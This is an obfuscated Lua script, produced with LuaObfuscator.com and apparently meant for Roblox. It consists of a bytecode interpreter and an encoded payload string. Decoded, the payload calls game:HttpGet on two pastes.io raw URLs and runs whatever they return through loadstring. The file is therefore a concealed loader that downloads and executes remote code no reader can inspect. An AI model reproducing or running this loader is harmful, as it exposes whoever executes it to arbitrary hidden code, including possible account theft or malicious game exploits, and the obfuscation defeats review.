--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v99=v5(v85,v19);v19=nil;return v99;else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-((1 + 1) -1))) + (620 -(555 + 64)))) ;return v86-(v86%(932 -((1734 -(282 + 595)) + 74))) ;else local v87=2^(v32-(569 -(367 + 201))) ;return (((v31%(v87 + v87))>=v87) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1637 -(1523 + 114) ;local v36;local v37;while true do if (v35==(1 + (117 -(32 + 85)))) then return (v37 * (364 -108)) + v36 ;end if (v35==((1044 + 21) -(68 + 997))) then v36,v37=v1(v16,v18,v18 + ((283 + 989) -((1183 -(892 + 65)) + 1044)) );v18=v18 + (8 -6) ;v35=1;end end end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -(87 + 263)) ;v38=181 -(67 + 113) ;end if (v38==(1 + 0)) then return (v42 * ((110899618 -69708799) -24413603)) + (v41 * ((87430 -39231) + (18289 -(802 + 150)))) + (v40 * (1017 -761)) + v39 ;end end end local function v24()local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1000 -(915 + 82))) then if (v48==0) then if (v47==(0 -0)) then return v49 * 0 ;else local v100=0 + 0 ;while true do if (v100==(0 -(0 + 0))) then v48=1188 -(1069 + 118) ;v46=0 -0 ;break;end end end elseif (v48==((16344 -11867) -2430)) then return ((v47==(0 + 0)) and (v49 * ((1 -0)/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(1814 -(368 + 423)) ) * (v46 + (v47/((6 -4)^(70 -(10 + 8))))) ;end if (v43==(3 -2)) then v46=443 -(416 + 26) ;v47=(v20(v45,3 -2 ,9 + 11 ) * (2^(56 -(85 -61)))) + v44 ;v43=861 -(814 + 45) ;end if (v43==(440 -(145 + (721 -428)))) then v48=v20(v45,451 -(44 + 386) ,31);v49=((v20(v45,1518 -(998 + 488) )==(1 + 0)) and  -(1 + 0 + 0)) or 1 ;v43=775 -(201 + 571) ;end if (v43==(1138 -(41 + 75 + 1022))) then v44=v23();v45=v23();v43=4 -3 ;end end end local function v25(v50)local v51;if  not v50 then local v88=885 -(261 + 624) ;while true do if (v88==((0 -0) -0)) then v50=v23();if (v50==(1080 -(1020 + 60))) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(1424 -(630 + 313 + 480)) );v18=v18 + v50 ;local v52={};for v67=3 -2 , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=561 -(79 + 482) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53~=(2 -0)) then else v58=nil;v59=nil;v53=8 -5 ;end if (1==v53) then v56=nil;v57=nil;v53=2;end if (v53==(288 -(134 + 151))) then v60=nil;while true do if (v54~=0) then else local v96=1665 -(970 + 695) ;while true do if ((0 -0)==v96) then v55={};v56={};v96=1991 -(582 + 1408) ;end if (v96==(6 -4)) then v54=1 -0 ;break;end if (1~=v96) then else v57={};v58={v55,v56,nil,v57};v96=2;end end end if ((781 -(162 + 618))==v54) then local v97=0 + 0 ;while true do if (v97==0) then v59=v23();v60={};v97=1;end if (v97~=(1 + 0)) then else for v102=1,v59 do local v103=0;local v104;local v105;local v106;while true do if (v103==(0 -0)) then local v152=0 -0 ;while true do if (v152~=(1 + 0)) then else v103=1637 -(1373 + 263) ;break;end if (v152==0) then v104=1000 -(451 + 549) ;v105=nil;v152=1;end end end if (v103==1) then v106=nil;while true do if (v104==(0 + 0)) then local v164=0;while true do if ((0 -0)==v164) then local v167=0 -0 ;while true do if (v167~=(1384 -(746 + 638))) then else v105=v21();v106=nil;v167=1 + 0 ;end if (v167==(1 -0)) then v164=342 -(218 + 123) ;break;end end end if (v164==1) then v104=1582 -(1535 + 46) ;break;end end end if (v104==1) then if (v105==1) then v106=v21()~=0 ;elseif (v105==2) then v106=v24();elseif (v105==3) then v106=v25();end v60[v102]=v106;break;end end break;end end end v58[3]=v21();v97=2 + 0 ;end if (v97==2) then v54=2;break;end end end if (v54~=2) then else local v98=0;while true do if (v98==(0 + 0)) then for v107=561 -(306 + 254) ,v23() do local v108=0;local v109;local v110;local v111;while true do if (0==v108) then local v153=0;while true do if (v153==0) then v109=0 + 0 ;v110=nil;v153=1 -0 ;end if (v153~=1) then else v108=1;break;end end end if (v108==1) then v111=nil;while true do if ((1467 -(899 + 568))==v109) then local v166=0;while true do if (0==v166) then v110=0 + 0 ;v111=nil;v166=2 -1 ;end if (v166==1) then v109=604 -(268 + 335) ;break;end end end if (v109==1) then while true do if (v110~=0) then else v111=v21();if (v20(v111,291 -(60 + 230) ,573 -(426 + 146) )~=(0 + 0)) then else local v168=0;local v169;local v170;local v171;local v172;while true do if (v168~=1) then else v171=nil;v172=nil;v168=2;end if (v168==0) then v169=1456 -(282 + 1174) ;v170=nil;v168=1;end if (v168==(813 -(569 + 242))) then while true do if (v169==3) then if (v20(v171,8 -5 ,1 + 2 )~=1) then else v172[1028 -(706 + 318) ]=v60[v172[1255 -(721 + 530) ]];end v55[v107]=v172;break;end if (v169~=(1272 -(945 + 326))) then else local v174=0;local v175;while true do if (v174==(0 -0)) then v175=0;while true do if (0~=v175) then else local v183=0 + 0 ;while true do if (v183~=0) then else v172={v22(),v22(),nil,nil};if (v170==0) then local v184=0;while true do if (v184==(1086 -(461 + 625))) then v172[1291 -(993 + 295) ]=v22();v172[1 + 3 ]=v22();break;end end elseif (v170==(1172 -(418 + 753))) then v172[3]=v23();elseif (v170==2) then v172[3]=v23() -((1 + 1)^16) ;elseif (v170~=3) then else local v189=0;local v190;local v191;while true do if (v189~=0) then else v190=0 + 0 ;v191=nil;v189=1 + 0 ;end if (v189==(1 + 0)) then while true do if (v190~=0) then else v191=529 -(406 + 123) ;while true do if (v191==(1769 -(1749 + 20))) then v172[1 + 2 ]=v23() -(2^(1338 -(1249 + 73))) ;v172[4]=v22();break;end end break;end end break;end end end v183=1;end if (v183~=(1 + 0)) then else v175=1146 -(466 + 679) ;break;end end end if (v175==1) then v169=2;break;end end break;end end end if ((4 -2)~=v169) then else if (v20(v171,2 -1 ,1901 -(106 + 1794) )==1) then v172[2]=v60[v172[1 + 1 ]];end if (v20(v171,1 + 1 ,2)==1) then v172[3]=v60[v172[8 -5 ]];end v169=3;end if (v169~=(0 -0)) then else local v176=114 -(4 + 110) ;while true do if (v176==1) then v169=585 -(57 + 527) ;break;end if (v176~=0) then else v170=v20(v111,1429 -(41 + 1386) ,106 -(17 + 86) );v171=v20(v111,3 + 1 ,13 -7 );v176=2 -1 ;end end end end break;end end end break;end end break;end end break;end end end for v112=1,v23() do v56[v112-1 ]=v28();end v98=1;end if (v98==1) then return v58;end end end end break;end if (v53==(166 -(122 + 44))) then v54=0 -0 ;v55=nil;v53=1;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82==0) then v79[v81[2]]=v63[v81[3]];else local v116=0;local v117;local v118;local v119;local v120;while true do if (v116==0) then v117=v81[2];v118,v119=v72(v79[v117](v13(v79,v117 + 1 ,v81[3])));v116=1;end if (v116==2) then for v160=v117,v74 do v120=v120 + 1 ;v79[v160]=v118[v120];end break;end if (v116==1) then v74=(v119 + v117) -1 ;v120=0;v116=2;end end end elseif (v82<=2) then local v121=v81[2];v79[v121]=v79[v121](v13(v79,v121 + 1 ,v74));elseif (v82>3) then local v134=v81[2];local v135,v136=v72(v79[v134](v13(v79,v134 + 1 ,v81[3])));v74=(v136 + v134) -1 ;local v137=0;for v155=v134,v74 do v137=v137 + 1 ;v79[v155]=v135[v137];end else for v158=v81[2],v81[3] do v79[v158]=nil;end end elseif (v82<=7) then if (v82<=5) then v79[v81[2]]();elseif (v82>6) then v79[v81[2]]=v81[3]~=0 ;else v73=v81[3];end elseif (v82<=8) then v79[v81[2]]=v63[v81[3]];elseif (v82==9) then do return;end else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=15) then if (v82<=12) then if (v82==11) then for v132=v81[2],v81[3] do v79[v132]=nil;end elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82<=13) then local v125=v81[2];local v126=v79[v81[3]];v79[v125 + 1 ]=v126;v79[v125]=v126[v81[4]];elseif (v82>14) then v79[v81[2]]();else local v142=v81[2];local v143=v79[v81[3]];v79[v142 + 1 ]=v143;v79[v142]=v143[v81[4]];end elseif (v82<=18) then if (v82<=16) then do return;end elseif (v82>17) then v79[v81[2]]=v81[3];else v73=v81[3];end elseif (v82<=19) then v79[v81[2]]=v81[3];elseif (v82==20) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else local v150=v81[2];v79[v150]=v79[v150](v13(v79,v150 + 1 ,v74));end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!063O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403203O00682O7470733A2O2F7061737465732E696F2F7261772F316E6A6C7A575235373803203O00682O7470733A2O2F7061737465732E696F2F7261772F6135464137746E475861001C3O0012133O00014O0003000100013O0026143O0002000100010004113O00020001001213000100013O00261400010005000100010004113O00050001001208000200023O001208000300033O00200E000300030004001213000500054O0007000600014O0004000300064O000200023O00022O0005000200010001001208000200023O001208000300033O00200E000300030004001213000500064O0007000600014O0004000300064O000200023O00022O00050002000100010004113O001B00010004113O000500010004113O001B00010004113O000200012O00093O00017O00",v9(),...);
